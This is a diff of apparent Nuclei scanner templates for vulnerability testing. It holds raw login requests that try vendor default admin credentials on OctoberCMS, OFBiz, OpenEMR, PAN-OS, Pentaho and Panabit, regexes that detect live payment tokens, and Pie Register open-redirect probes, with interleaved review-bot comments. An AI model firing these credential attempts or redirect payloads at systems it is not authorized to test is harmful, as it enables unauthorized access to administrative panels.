@@ -0,0 +1,59 @@ +id: octobercms-default-login +info: + name: OctoberCMS - Default Admin Discovery + author: princechaddha + severity: high + description: OctoberCMS default admin credentials were discovered. + reference: + - https://github.com/octobercms/october + - https://octobercms.com/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + verified: true + shodan-query: http.component:"October CMS" + tags: octobercms,default-login,oss +requests: + - raw: + - | + GET /backend/backend/auth/signin HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + - | + POST /backend/backend/auth/signin HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + + _token={{token}}&postback=1&login={{username}}&password={{password}} + cookie-reuse: true + attack: clusterbomb + payloads: + username: + - admin + password: + - admin + - "" + matchers-condition: and + matchers: + - type: word + part: header + words: + - "october_session=" + - "admin_auth=" + condition: and + - type: status + status: + - 302 + extractors: + - type: regex + part: body + name: token + internal: true + group: 1 + regex: + - 'meta name="csrf\-token" content="([A-Za-z0-9]+)">' + +# Enhanced by mp on 2022/07/15 diff --git a/poc/auth/ofbiz-default-credentials.yaml b/poc/auth/ofbiz-default-credentials.yaml index 449c67c5b2..9c83c79a9d 100644 --- a/poc/auth/ofbiz-default-credentials.yaml +++ b/poc/auth/ofbiz-default-credentials.yaml @@ -1,11 +1,9 @@ id: ofbiz-default-credentials - info: name: Apache OfBiz Default Credentials author: pdteam severity: medium tags: ofbiz,default-login - requests: - method: POST path: @@ -18,4 +16,4 @@ requests: words: - "ofbiz-pagination-template" - "Powered by OFBiz" - condition: and \ No newline at end of file + condition: and 
diff --git a/poc/auth/ofbiz-default-login-9210.yaml b/poc/auth/ofbiz-default-login-9210.yaml deleted file mode 100644 index 3c272f1007..0000000000 --- a/poc/auth/ofbiz-default-login-9210.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: ofbiz-default-login - -info: - name: Apache OfBiz Default Login - author: pdteam - severity: high - description: Apache OfBiz default admin credentials were discovered. - reference: - - https://cwiki.apache.org/confluence/display/OFBIZ/Apache+OFBiz+Technical+Production+Setup+Guide - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - metadata: - max-request: 1 - tags: ofbiz,default-login,apache - -http: - - raw: - - | - POST /control/login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - USERNAME={{username}}&PASSWORD={{password}}&FTOKEN=&JavaScriptEnabled=Y - - payloads: - username: - - admin - password: - - ofbiz - attack: pitchfork - matchers: - - type: word - words: - - "ofbiz-pagination-template" - - "Powered by OFBiz" - condition: and - -# digest: 4b0a00483046022100b51f0ae7f8930dee1c2e79a346c9747aedb0bbc606672d874692268ff0c204d7022100f433a7bb473f26f5366a2cf0cfff5749d6547992d9b06dd9e0099ac817613739:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/ofbiz-default-login-9211.yaml b/poc/auth/ofbiz-default-login-9211.yaml index a7ee2e5601..ce10e4ca8d 100644 --- a/poc/auth/ofbiz-default-login-9211.yaml +++ b/poc/auth/ofbiz-default-login-9211.yaml @@ -3,6 +3,13 @@ info: name: Apache OfBiz Default Login author: pdteam severity: medium + description: Apache OfBiz default admin credentials were discovered. + reference: + - https://cwiki.apache.org/confluence/display/OFBIZ/Apache+OFBiz+Technical+Production+Setup+Guide + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: ofbiz,default-login,apache requests: - raw: 
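Review bot: The `classification` block added in poc/auth/ofbiz-default-login-9211.yaml gives `cvss-score: 8.3`, but the unchanged `severity: medium` directly above it contradicts that score; the copy deleted in this commit (ofbiz-default-login-9210.yaml) used `severity: high`. Change the line to `severity: high` so that severity filters and the score agree. The hunk ends inside the `requests` block, so the request and matchers are not visible here.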
@@ -24,3 +31,5 @@ requests: - "ofbiz-pagination-template" - "Powered by OFBiz" condition: and + +# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/open-stack-dashboard-login-9321.yaml b/poc/auth/open-stack-dashboard-login-9321.yaml new file mode 100644 index 0000000000..9c17c71f30 --- /dev/null +++ b/poc/auth/open-stack-dashboard-login-9321.yaml @@ -0,0 +1,21 @@ +id: open-stack-dashboard-login +info: + name: OpenStack Dashboard + author: dhiyaneshDK,hackergautam + severity: info + reference: https://www.exploit-db.com/ghdb/6464 + tags: panel,openstack +requests: + - method: GET + path: + - '{{BaseURL}}/dashboard/auth/login/' + - '{{BaseURL}}/horizon/auth/login/?next=/horizon/' + redirects: true + matchers-condition: and + matchers: + - type: word + words: + - "Login - OpenStack Dashboard" + - type: status + status: + - 200 diff --git a/poc/auth/open-stack-dashboard-login-9322.yaml b/poc/auth/open-stack-dashboard-login-9322.yaml deleted file mode 100644 index 299fe028d4..0000000000 --- a/poc/auth/open-stack-dashboard-login-9322.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: open-stack-dashboard-login -info: - name: OpenStack Dashboard - author: dhiyaneshDK,hackergautam - severity: info - reference: - - https://www.exploit-db.com/ghdb/6464 - tags: panel,openstack -requests: - - method: GET - path: - - '{{BaseURL}}/dashboard/auth/login/' - - '{{BaseURL}}/horizon/auth/login/?next=/horizon/' - redirects: true - matchers-condition: and - matchers: - - type: word - words: - - "Login - OpenStack Dashboard" - - type: status - status: - - 200 diff --git a/poc/auth/open-stack-dashboard-login-9323.yaml b/poc/auth/open-stack-dashboard-login-9323.yaml index 9c17c71f30..a7a17f56ba 100644 --- a/poc/auth/open-stack-dashboard-login-9323.yaml +++ b/poc/auth/open-stack-dashboard-login-9323.yaml 
@@ -1,7 +1,7 @@ id: open-stack-dashboard-login info: name: OpenStack Dashboard - author: dhiyaneshDK,hackergautam + author: dhiyaneshDK & hackergautam severity: info reference: https://www.exploit-db.com/ghdb/6464 tags: panel,openstack diff --git a/poc/auth/openemr-default-login-9270.yaml b/poc/auth/openemr-default-login-9270.yaml index 56d37ca0d7..0d2f25a536 100644 --- a/poc/auth/openemr-default-login-9270.yaml +++ b/poc/auth/openemr-default-login-9270.yaml @@ -1,8 +1,8 @@ id: openemr-default-login info: - name: OpenEMR Default Login + name: OpenEMR - Default Admin Discovery author: Geekby - description: OpenEMR default login was discovered. + description: OpenEMR default admin credentials were discovered. severity: high reference: - https://github.com/openemr/openemr-devops/tree/master/docker/openemr/6.1.0/#openemr-official-docker-image @@ -39,3 +39,5 @@ requests: - type: status status: - 302 + +# Enhanced by mp on 2022/07/15 diff --git a/poc/auth/openemr-default-login.yaml b/poc/auth/openemr-default-login.yaml deleted file mode 100644 index 0d2f25a536..0000000000 --- a/poc/auth/openemr-default-login.yaml +++ /dev/null 
@@ -1,43 +0,0 @@ -id: openemr-default-login -info: - name: OpenEMR - Default Admin Discovery - author: Geekby - description: OpenEMR default admin credentials were discovered. - severity: high - reference: - - https://github.com/openemr/openemr-devops/tree/master/docker/openemr/6.1.0/#openemr-official-docker-image - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - metadata: - fofa-query: app="OpenEMR" - shodan-query: http.html:"OpenEMR" - tags: openemr,default-login -requests: - - raw: - - | - POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_login_session_management=1&languageChoice=1&authUser={{user}}&clearPass={{pass}}&languageChoice=10 - attack: pitchfork - payloads: - user: - - admin - pass: - - pass - matchers-condition: and - matchers: - - type: word - part: header - words: - - "main.php?token_main=" - - "OpenEMR" - condition: and - - type: status - status: - - 302 - -# Enhanced by mp on 2022/07/15 diff --git a/poc/auth/openwrt-default-login.yaml b/poc/auth/openwrt-default-login.yaml index 50dd0fa3e5..5bbbca6acc 100644 --- a/poc/auth/openwrt-default-login.yaml +++ b/poc/auth/openwrt-default-login.yaml 
@@ -1,25 +1,18 @@ id: openwrt-default-login - info: - name: Opentwrt - Admin Login Page + name: Opentwrt Default Login author: For3stCo1d severity: high - description: An Opentwrt admin login page was discovered. reference: - https://forum.archive.openwrt.org/viewtopic.php?id=16611 metadata: - max-request: 1 shodan-query: http.title:"OpenWrt - LuCI" - tags: default-login,openwrt - -http: + tags: openwrt,default-login +requests: - method: GET path: - "{{BaseURL}}/cgi-bin/luci" - matchers: - type: word words: - 'cgi-bin/luci/admin/system/admin' - -# digest: 4b0a004830460221008f900a97a3c80d4a01927a3363847754aeb95f5804553865aad9c956a45d07f0022100bb0a345862d115387483d56dce0d1d0933bb0cb118128dd0f23336373953ce30:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/oracle-opera-login.yaml b/poc/auth/oracle-opera-login.yaml new file mode 100644 index 0000000000..25b4e8b41e --- /dev/null +++ b/poc/auth/oracle-opera-login.yaml @@ -0,0 +1,38 @@ +id: oracle-opera-login + +info: + name: Oracle Opera Login - Detect + author: DhiyaneshDK,righettod + severity: info + classification: + cwe-id: CWE-200 + metadata: + verified: true + max-request: 2 + shodan-query: title:"Oracle Opera" && html:"/OperaLogin/Welcome.do" + tags: panel,opera,oracle,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/OperaLogin/Welcome.do" + + host-redirects: true + max-redirects: 2 + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Oracle, OPERA' + - 'OPERA Login' + condition: or + + - type: status + status: + - 200 + +# digest: 4a0a00473045022100913b287a8b0b9de193b993ae33b49bbf5a2173919ce3de7d8e329e968809d37f022014587108987bac2ebd1c1f4a72620e65660690bce165d0719efa4760525faacf:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/panabit-default-login-9438.yaml b/poc/auth/panabit-default-login-9438.yaml index 06d198deff..71a02ff79b 100644 --- a/poc/auth/panabit-default-login-9438.yaml 
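Review bot: The only matcher in poc/auth/openwrt-default-login.yaml is a word match on `cgi-bin/luci/admin/system/admin` with no `part` and no status check, yet the template reports `severity: high` under the `default-login` tag after a single unauthenticated GET, so any response that merely contains that path raises the finding. Adding `matchers-condition: and`, `part: body` on the word matcher and a `- type: status` matcher for 200 would narrow it. The hunk also removes `description`, `max-request` and the `# digest:` line and goes back from `http:` to the older `requests:` key, which looks like a downgrade to an earlier revision of the template. The hunks for panabit-ixcache-default-login-9443.yaml, phabricator-login.yaml, pinpoint-unauth-9588.yaml, plastic-scm-login.yaml and pure-storage-login.yaml do the same. The name still reads `Opentwrt`, presumably a typo for OpenWrt.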
+++ b/poc/auth/panabit-default-login-9438.yaml @@ -3,8 +3,16 @@ info: name: Panabit Gateway Default Login author: pikpikcu severity: high - reference: https://max.book118.com/html/2017/0623/117514590.shtm + description: Panabit Gateway default credentials were discovered. tags: panabit,default-login + reference: + - https://max.book118.com/html/2017/0623/117514590.shtm + - https://en.panabit.com/wp-content/uploads/Panabit-Intelligent-Application-Gateway-04072020.pdf + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.8 + cve-id: + cwe-id: CWE-522 requests: - raw: - | @@ -42,3 +50,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/panabit-default-login-9440.yaml b/poc/auth/panabit-default-login-9440.yaml index 71a02ff79b..720a8ce721 100644 --- a/poc/auth/panabit-default-login-9440.yaml +++ b/poc/auth/panabit-default-login-9440.yaml @@ -1,18 +1,20 @@ id: panabit-default-login info: name: Panabit Gateway Default Login - author: pikpikcu + author: pikpikcu,ritikchaddha severity: high description: Panabit Gateway default credentials were discovered. - tags: panabit,default-login reference: - https://max.book118.com/html/2017/0623/117514590.shtm - https://en.panabit.com/wp-content/uploads/Panabit-Intelligent-Application-Gateway-04072020.pdf + - https://topic.alibabacloud.com/a/panabit-monitoring-installation-tutorial_8_8_20054193.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N cvss-score: 5.8 - cve-id: cwe-id: CWE-522 + metadata: + fofa-query: app="Panabit-智能网关" + tags: panabit,default-login requests: - raw: - | 
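Review bot: The added `classification` block in panabit-default-login-9438.yaml sets `cvss-score: 5.8` with `C:L/I:N/A:N`, which is in the medium band while the template keeps `severity: high`. The other default-credential templates in this commit (panos-default-login, pentaho-default-login) use 8.3 with `C:L/I:L/A:L` for the same CWE-522 condition, so consumers that triage on the CVSS fields will rank this admin default login below its siblings. The block also adds a `cve-id:` key with no value, as do panos-default-login-9454.yaml and pentaho-default-login-9477.yaml, which leaves a null where tooling may expect a string. Suggested: align the vector with the siblings or lower `severity`, and drop the empty `cve-id:` line.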
@@ -25,28 +27,32 @@ requests: Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 ------WebKitFormBoundaryAjZMsILtbrBp8VbC - Content-Disposition: form-data; name="{{username}}" + Content-Disposition: form-data; name="username" - admin + {{username}} ------WebKitFormBoundaryAjZMsILtbrBp8VbC - Content-Disposition: form-data; name="{{password}}" + Content-Disposition: form-data; name="password" - panabit + {{password}} ------WebKitFormBoundaryAjZMsILtbrBp8VbC-- payloads: username: - - username + - admin password: - - password + - panabit attack: pitchfork matchers-condition: and matchers: - type: word + part: body words: - '<META HTTP-EQUIV=REFRESH CONTENT="0;URL=/index.htm">' - 'urn:schemas-microsoft-com:vml' - part: body condition: and + - type: word + part: header + words: + - "paonline_admin" - type: status status: - 200 diff --git a/poc/auth/panabit-ixcache-default-login-9443.yaml b/poc/auth/panabit-ixcache-default-login-9443.yaml index b1e035f966..6ca7af1572 100644 --- a/poc/auth/panabit-ixcache-default-login-9443.yaml +++ b/poc/auth/panabit-ixcache-default-login-9443.yaml @@ -1,17 +1,14 @@ id: panabit-ixcache-default-login info: - name: Panabit iXCache - Default Admin Login + name: Panabit iXCache Default Login author: ritikchaddha severity: high - description: Panabit iXCache default admin login credentials were successful. reference: - http://forum.panabit.com/thread-10830-1-1.html - metadata: - max-request: 1 - tags: default-login,ixcache,panabit + tags: ixcache,default-login,panabit -http: +requests: - raw: - | POST /login/userverify.cgi HTTP/1.1 @@ -19,15 +16,16 @@ http: username={{username}}&password={{password}} - attack: pitchfork payloads: username: - admin password: - ixcache + attack: pitchfork matchers-condition: and matchers: + - type: word part: body words: 
@@ -36,5 +34,3 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100c220cc1239979a33a9fa0ff94786fb09f6d2899e97a21be24d458ee690bf2272022100f2539225eb3aaab67a45563f00a03398885b57ed3c0dac3d2b0f6f99e3c0395d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/panabit-ixcache-default-login.yaml b/poc/auth/panabit-ixcache-default-login.yaml new file mode 100644 index 0000000000..4045f6fd00 --- /dev/null +++ b/poc/auth/panabit-ixcache-default-login.yaml @@ -0,0 +1,30 @@ +id: panabit-ixcache-default-login +info: + name: Panabit iXCache Default Login + author: ritikchaddha + severity: high + reference: + - http://forum.panabit.com/thread-10830-1-1.html + tags: ixcache,default-login,panabit +requests: + - raw: + - | + POST /login/userverify.cgi HTTP/1.1 + Host: {{Hostname}} + + username={{username}}&password={{password}} + payloads: + username: + - admin + password: + - ixcache + attack: pitchfork + matchers-condition: and + matchers: + - type: word + part: body + words: + - "URL=/cgi-bin/monitor.cgi" + - type: status + status: + - 200 diff --git a/poc/auth/panos-default-login-9454.yaml b/poc/auth/panos-default-login-9454.yaml index 4b6d36c7fa..d08faa6f8d 100644 --- a/poc/auth/panos-default-login-9454.yaml +++ b/poc/auth/panos-default-login-9454.yaml 
@@ -1,11 +1,19 @@ id: panos-default-login + info: name: Palo Alto Networks PAN-OS Default Login author: Techryptic (@Tech) severity: high - description: Default Login of admin:admin on Palo Alto Networks PAN-OS application. - reference: https://docs.paloaltonetworks.com/pan-os/8-1/pan-os-admin/getting-started/integrate-the-firewall-into-your-management-network/perform-initial-configuration.html#:~:text=By%20default%2C%20the%20firewall%20has,with%20other%20firewall%20configuration%20tasks. + description: Palo Alto Networks PAN-OS application default admin credentials were discovered. + reference: + - https://docs.paloaltonetworks.com/pan-os/8-1/pan-os-admin/getting-started/integrate-the-firewall-into-your-management-network/perform-initial-configuration.html#:~:text=By%20default%2C%20the%20firewall%20has,with%20other%20firewall%20configuration%20tasks. tags: panos,default-login + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 + requests: - raw: - | @@ -14,21 +22,27 @@ requests: Content-Type: application/x-www-form-urlencoded user={{username}}&passwd={{password}}&challengePwd=&ok=Login + attack: pitchfork payloads: username: - admin password: - admin + matchers-condition: and matchers: - type: word part: header words: - "Set-Cookie: PHPSESSID" + - type: word words: - "Warning: Your device is still configured with the default admin" + - type: status status: - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/panos-default-login-9455.yaml b/poc/auth/panos-default-login-9455.yaml new file mode 100644 index 0000000000..4b6d36c7fa --- /dev/null +++ b/poc/auth/panos-default-login-9455.yaml 
@@ -0,0 +1,34 @@ +id: panos-default-login +info: + name: Palo Alto Networks PAN-OS Default Login + author: Techryptic (@Tech) + severity: high + description: Default Login of admin:admin on Palo Alto Networks PAN-OS application. + reference: https://docs.paloaltonetworks.com/pan-os/8-1/pan-os-admin/getting-started/integrate-the-firewall-into-your-management-network/perform-initial-configuration.html#:~:text=By%20default%2C%20the%20firewall%20has,with%20other%20firewall%20configuration%20tasks. + tags: panos,default-login +requests: + - raw: + - | + POST /php/login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + user={{username}}&passwd={{password}}&challengePwd=&ok=Login + attack: pitchfork + payloads: + username: + - admin + password: + - admin + matchers-condition: and + matchers: + - type: word + part: header + words: + - "Set-Cookie: PHPSESSID" + - type: word + words: + - "Warning: Your device is still configured with the default admin" + - type: status + status: + - 200 diff --git a/poc/auth/panos-default-login.yaml b/poc/auth/panos-default-login.yaml new file mode 100644 index 0000000000..cf85a349e1 --- /dev/null +++ b/poc/auth/panos-default-login.yaml 
@@ -0,0 +1,42 @@ +id: panos-default-login +info: + name: Palo Alto Networks PAN-OS Default Login + author: Techryptic (@Tech) + severity: high + description: Palo Alto Networks PAN-OS application default admin credentials were discovered. + reference: + - https://docs.paloaltonetworks.com/pan-os/8-1/pan-os-admin/getting-started/integrate-the-firewall-into-your-management-network/perform-initial-configuration.html#:~:text=By%20default%2C%20the%20firewall%20has,with%20other%20firewall%20configuration%20tasks. + tags: panos,default-login + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 +requests: + - raw: + - | + POST /php/login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + user={{username}}&passwd={{password}}&challengePwd=&ok=Login + attack: pitchfork + payloads: + username: + - admin + password: + - admin + matchers-condition: and + matchers: + - type: word + part: header + words: + - "Set-Cookie: PHPSESSID" + - type: word + words: + - "Warning: Your device is still configured with the default admin" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/paypal-braintree-token(1).yaml b/poc/auth/paypal-braintree-token(1).yaml new file mode 100644 index 0000000000..59dc3e8dbd --- /dev/null +++ b/poc/auth/paypal-braintree-token(1).yaml @@ -0,0 +1,16 @@ +id: paypal-braintree-token + +info: + name: Paypal Braintree Access Token + author: gaurang + severity: high + tags: token,file,paypal + +file: + - extensions: + - all + + extractors: + - type: regex + regex: + - "access_token\\$production\\$[0-9a-z]{16}\\$[0-9a-f]{32}" diff --git a/poc/auth/paypal-braintree-token-11856.yaml b/poc/auth/paypal-braintree-token-11856.yaml deleted file mode 100644 index 142d2cb23c..0000000000 --- a/poc/auth/paypal-braintree-token-11856.yaml +++ /dev/null 
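Review bot: The regex extractor in the new poc/auth/paypal-braintree-token(1).yaml returns the whole matched `access_token$production$…` string, so any scan output, log or report produced with this template contains the live credential it found. A header comment would make the handling expectation explicit, for example `# Matches are printed verbatim: treat scan output as secret material and rotate any token reported.` The `(1)` suffix in the file name suggests an accidental copy, and the file shares `id: paypal-braintree-token` with paypal-braintree-token.yaml, which this commit also modifies.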
@@ -1,13 +0,0 @@ -id: paypal-braintree-token -info: - name: Paypal Braintree Access Token - author: gaurang - severity: high - tags: token,file,paypal -file: - - extensions: - - all - extractors: - - type: regex - regex: - - "access_token\\$production\\$[0-9a-z]{16}\\$[0-9a-f]{32}" diff --git a/poc/auth/paypal-braintree-token.yaml b/poc/auth/paypal-braintree-token.yaml index 7b6e80e01e..142d2cb23c 100644 --- a/poc/auth/paypal-braintree-token.yaml +++ b/poc/auth/paypal-braintree-token.yaml @@ -1,5 +1,4 @@ id: paypal-braintree-token - info: name: Paypal Braintree Access Token author: gaurang @@ -8,10 +7,7 @@ info: file: - extensions: - all - extractors: - type: regex regex: - "access_token\\$production\\$[0-9a-z]{16}\\$[0-9a-f]{32}" - -# digest: 4b0a00483046022100914fa8c94e14b34dcee4ae0999af373e7133288cd065c68c6e7c896ea6596ba2022100b7496af30b2264d69b60d8f9d420bb7d52294ed77bb7c762497b871053466a66:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/pentaho-default-login-9477.yaml b/poc/auth/pentaho-default-login-9477.yaml index 241374072a..895781a8a6 100644 --- a/poc/auth/pentaho-default-login-9477.yaml +++ b/poc/auth/pentaho-default-login-9477.yaml @@ -1,18 +1,21 @@ id: pentaho-default-login + info: name: Pentaho Default Login author: pussycat0x - severity: high description: Pentaho default admin credentials were discovered. + severity: high + metadata: + shodan-query: pentaho + tags: pentaho,default-login reference: - https://www.hitachivantara.com/en-us/pdfd/training/pentaho-lesson-1-user-console-overview.pdf classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 + cve-id: cwe-id: CWE-522 - metadata: - shodan-query: pentaho - tags: pentaho,default-login + requests: - raw: - | @@ -21,12 +24,14 @@ requests: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 j_username={{user}}&j_password={{pass}} + attack: pitchfork payloads: user: - admin pass: - password + matchers-condition: and matchers: - type: word 
@@ -35,6 +40,7 @@ requests: - 'pentaho/Home' - 'JSESSIONID=' condition: and + - type: status status: - 302 diff --git a/poc/auth/pentaho-default-login-9478.yaml b/poc/auth/pentaho-default-login-9478.yaml deleted file mode 100644 index 889ea3ffa3..0000000000 --- a/poc/auth/pentaho-default-login-9478.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: pentaho-default-login -info: - name: Pentaho Default Login - author: pussycat0x - severity: high - metadata: - shodan-query: pentaho - tags: pentaho,default-login -requests: - - raw: - - | - POST /pentaho/j_spring_security_check HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - - j_username={{user}}&j_password={{pass}} - attack: pitchfork - payloads: - user: - - admin - pass: - - password - matchers-condition: and - matchers: - - type: word - part: header - words: - - 'pentaho/Home' - - 'JSESSIONID=' - condition: and - - type: status - status: - - 302 diff --git a/poc/auth/pentaho-default-login-9480.yaml b/poc/auth/pentaho-default-login-9480.yaml new file mode 100644 index 0000000000..241374072a --- /dev/null +++ b/poc/auth/pentaho-default-login-9480.yaml 
@@ -0,0 +1,42 @@ +id: pentaho-default-login +info: + name: Pentaho Default Login + author: pussycat0x + severity: high + description: Pentaho default admin credentials were discovered. + reference: + - https://www.hitachivantara.com/en-us/pdfd/training/pentaho-lesson-1-user-console-overview.pdf + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + shodan-query: pentaho + tags: pentaho,default-login +requests: + - raw: + - | + POST /pentaho/j_spring_security_check HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + j_username={{user}}&j_password={{pass}} + attack: pitchfork + payloads: + user: + - admin + pass: + - password + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'pentaho/Home' + - 'JSESSIONID=' + condition: and + - type: status + status: + - 302 + +# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/phabricator-login.yaml b/poc/auth/phabricator-login.yaml index fa4fcd4139..1d760838f2 100644 --- a/poc/auth/phabricator-login.yaml +++ b/poc/auth/phabricator-login.yaml 
@@ -1,32 +1,20 @@ id: phabricator-login - info: - name: Phabricator Login Panel - Detect + name: Phabricator Login author: dhiyaneshDK severity: info - description: Phabricator login panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 1 - shodan-query: html:"phabricator-standard-page" tags: panel,phabricator - -http: + metadata: + shodan-query: 'html:"phabricator-standard-page"' +requests: - method: GET path: - '{{BaseURL}}/auth/login/' - matchers-condition: and matchers: - type: word words: - 'phabricator-standard-page' - - type: status status: - 200 - -# digest: 4b0a00483046022100c0b9d8f3946c3e2dc2f6cddccc3e0261bc9203d244d5c7f1e673a55b7c15e20b022100b956e70cef96322194942a7d3c17b1365f2e379622e85481b39329c5d25d969a:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/pictatic-api-key-9576.yaml b/poc/auth/pictatic-api-key-9576.yaml index 946aed1ebf..ec20f07569 100644 --- a/poc/auth/pictatic-api-key-9576.yaml +++ b/poc/auth/pictatic-api-key-9576.yaml @@ -1,13 +1,16 @@ id: pictatic-api-key + info: name: Pictatic API Key author: gaurang severity: high tags: token,file + file: - extensions: - all + extractors: - type: regex regex: - - "sk_live_[0-9a-z]{32}" + - "sk_live_[0-9a-z]{32}" \ No newline at end of file diff --git a/poc/auth/pictatic-api-key.yaml b/poc/auth/pictatic-api-key.yaml index 41ea01a136..946aed1ebf 100644 --- a/poc/auth/pictatic-api-key.yaml +++ b/poc/auth/pictatic-api-key.yaml @@ -1,5 +1,4 @@ id: pictatic-api-key - info: name: Pictatic API Key author: gaurang @@ -8,10 +7,7 @@ info: file: - extensions: - all - extractors: - type: regex regex: - "sk_live_[0-9a-z]{32}" - -# digest: 4a0a00473045022100d571fd7454b599f0a3ae00922d80dfadb02ac853b00328f07a4f5bd41a63d879022001109992bb9b44fcacba43a0f3f72b19a6ad1b5f7d3e4c00d20e80cd1ec0e4d8:922c64590222798bb761d5b6d8e72950 
diff --git a/poc/auth/pieregister-open-redirect-9577.yaml b/poc/auth/pieregister-open-redirect-9577.yaml index 294b47b3a1..9c51ff20f2 100644 --- a/poc/auth/pieregister-open-redirect-9577.yaml +++ b/poc/auth/pieregister-open-redirect-9577.yaml @@ -1,23 +1,22 @@ id: pieregister-open-redirect + info: - name: WordPress Pie Register < 3.7.2.4 - Open Redirect - author: 0x_Akoko + name: Pie Register < 3.7.2.4 - Open Redirect severity: low - description: WordPress Pie Register < 3.7.2.4 is susceptible to an open redirect vulnerability because the plugin passes unvalidated user input to the wp_redirect() function. + author: 0x_Akoko + description: The plugin passes unvalidated user input to the wp_redirect() function, without validating it, leading to an Open redirect issue. reference: - https://wpscan.com/vulnerability/f6efa32f-51df-44b4-bbba-e67ed5785dd4 - https://wordpress.org/plugins/pie-register/ - classification: - cwe-id: CWE-601 tags: wordpress,redirect,wp-plugin,pieregister + requests: - method: GET path: - "{{BaseURL}}/?piereg_logout_url=true&redirect_to=https://example.com" + matchers: - type: regex part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - -# Enhanced by mp on 2022/04/13 diff --git a/poc/auth/pieregister-open-redirect-9579.yaml b/poc/auth/pieregister-open-redirect-9579.yaml index 7a8e6baf77..294b47b3a1 100644 --- a/poc/auth/pieregister-open-redirect-9579.yaml +++ b/poc/auth/pieregister-open-redirect-9579.yaml @@ -13,11 +13,11 @@ info: requests: - method: GET path: - - "{{BaseURL}}/?piereg_logout_url=true&redirect_to=https://interact.sh" + - "{{BaseURL}}/?piereg_logout_url=true&redirect_to=https://example.com" matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' # Enhanced by mp on 2022/04/13 
diff --git a/poc/auth/pieregister-plugin-open-redirect.yaml b/poc/auth/pieregister-plugin-open-redirect.yaml index c62c96f14f..e26d6d42a2 100644 --- a/poc/auth/pieregister-plugin-open-redirect.yaml +++ b/poc/auth/pieregister-plugin-open-redirect.yaml @@ -1,16 +1,16 @@ id: wptouch-plugin-open-redirect info: - name: WPTouch Switch Desktop 3.x Open Redirection + name: Pie Register < 3.7.2.4 - Open Redirect author: 0x_Akoko - reference: https://cxsecurity.com/issue/WLB-2020030114 - severity: medium - tags: wp,redirect,wordpress + reference: https://wpscan.com/vulnerability/f6efa32f-51df-44b4-bbba-e67ed5785dd4 + severity: low + tags: wp,redirect,wp-plugin requests: - method: GET path: - - "{{BaseURL}}/?wptouch_switch=desktop&redirect=https://example.com/" + - "{{BaseURL}}/?piereg_logout_url=true&redirect_to=https://example.com" matchers: - type: regex diff --git a/poc/auth/pinpoint-unauth-9588.yaml b/poc/auth/pinpoint-unauth-9588.yaml index 067200feee..a36b59fbc2 100644 --- a/poc/auth/pinpoint-unauth-9588.yaml +++ 